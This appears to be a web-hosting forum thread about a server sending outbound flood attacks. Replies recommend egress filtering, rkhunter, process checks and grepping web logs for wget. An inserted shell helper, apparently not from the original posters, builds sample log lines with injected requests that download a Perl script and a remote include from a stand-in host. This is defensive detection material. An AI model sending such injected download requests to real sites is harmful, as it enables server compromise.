Hi,
Someone is doing an outbound attack from our server and we got a complaint from the DC, but they haven't provided the info. They provided the IP address which was hit from our server.
What file do I need to check?
Anyone can help me?
thanks
shan
Scan your /tmp and /var/tmp for strange files belonging to nobody and search the forums on outbound UDP attack, that will show a thread with more helpful info.
You need to clean up your server from all the strange files downloaded and/or installed on your server. Kill all the processes used/exhausted by these tools and then you need to patch, upgrade, and secure your server. Good luck!
Andy Reed
RHCE and CCNA
ServerTune.com
You can quickly install this firewall so that it will stop the attack until you discover the source.
http://www.rfxnetworks.com/apf.php
Thank you guys, but I have the targeted IP, is there any way I can track it down?
Can we check it at /var/log/messages?
thanks
I have installed APF and how do we stop the outbound attack? I have the targeted IP.
Please help me.
thanks
With APF, set up and enable egress filtering. It will not stop your server from sending the attack, but it will stop the packets from leaving your server.
Check server logs (httpd logs) for the word wget. This is often used as part of a URL exploit that tells a site on your server to download and install a perl script to launch packet attacks. This will give you an idea of how the attack was started, and which site you need to be checking.
Look for outdated programs on your server (read: phpBB).
Run rkhunter.
Secure your /tmp directory.
search the /tmp directory for any pl files. If you find them, delete them.
http://eth0.us is a good place to start.
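The two checks above (grep the httpd logs for "wget" to find the entry point, and look for .pl files in /tmp) as an added shell helper; this is not code from the thread or from APF/rkhunter, and it runs over constructed sample data, so the log lines, IPs and paths are assumptions, not anything from the poster's server:

```shell
#!/bin/sh
# Added triage helper (not from the thread). It implements the two checks
# recommended above, grepping web logs for download-tool commands and listing
# Perl scripts in a temp directory, over constructed sample data so it runs
# stand-alone. A real run would point at access_log and /tmp (paths assumed).

WORK="$(mktemp -d)"
SAMPLE_LOG="$WORK/access_log"
SAMPLE_TMP="$WORK/tmp"

# Constructed Apache-style log lines; the IPs are documentation ranges.
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [01/Jan/2006:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2006:10:00:05 +0000] "GET /forum/viewtopic.php?t=1&cmd=wget%20http://example.invalid/x.pl HTTP/1.1" 200 214
203.0.113.9 - - [01/Jan/2006:10:00:09 +0000] "GET /gallery/index.php?page=http://example.invalid/c.txt&x=curl HTTP/1.1" 200 98
192.0.2.10 - - [01/Jan/2006:10:00:12 +0000] "GET /about.html HTTP/1.1" 200 1024
EOF

# Constructed /tmp contents: one dropped Perl script and one harmless file.
mkdir -p "$SAMPLE_TMP"
printf '#!/usr/bin/perl\n' > "$SAMPLE_TMP/x.pl"
printf 'session data\n' > "$SAMPLE_TMP/sess_abc123"

# Print "count client_ip script_path" for requests whose URL carries a
# download tool name, most frequent first; the script path shows which
# site on the box was used as the entry point.
suspicious_requests() {
    grep -iE '"(GET|POST) [^"]*(wget|curl|lwp-download)' "$1" \
        | awk '{ split($7, u, "?"); print $1, u[1] }' \
        | sort | uniq -c | sort -rn
}

# Total number of matching request lines, for a quick yes/no.
suspicious_count() {
    suspicious_requests "$1" | awk '{ s += $1 } END { print s + 0 }'
}

# List Perl scripts and user-executable files sitting in a temp directory.
tmp_script_files() {
    find "$1" -type f \( -name '*.pl' -o -perm -u+x \)
}

echo "== requests carrying download tools =="
suspicious_requests "$SAMPLE_LOG"
echo "== scripts in $SAMPLE_TMP =="
tmp_script_files "$SAMPLE_TMP"
```

The matched script path is the vhost to audit and patch; the same grep against all vhost logs at once (e.g. the logs directory) shows whether more than one site was used.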
Check all the current processes through ps -auxf | more. It can give you a glimpse of the attack that is originating from the server. Probably someone is scanning the other host for a vulnerability.
Stop Reymond !! A single conversation with a wise man is better than ten years of study. So....
Hi,
I have used rkhunter and got the following message. Does anything need to be fixed?
Any help would be appreciated.
Security advisories
* Check: Groups and Accounts
Searching for /etc/passwd... [ Found ]
Checking users with UID '0' (root)... [ OK ]
* Check: SSH
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
Also, got this
MD5
MD5 compared: 0
Incorrect MD5 checksums: 0
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 3
Scanning took 466 seconds
How do we track it down?
Your server is most likely not compromised; some sort of UDP or TCP flooder was uploaded into your tmp dir through an insecure PHP script.
Run a ps auxf and look for something running that should not be.
My god man, if you can't find what's leaving your server, hire someone to track it down for you.
We can't see it from the forums!
Lowest Host/Empire Technology LLC
Affordable hosting solutions http://empire-hosting.net
List Your hosting site FREE in http://hostgeneration.com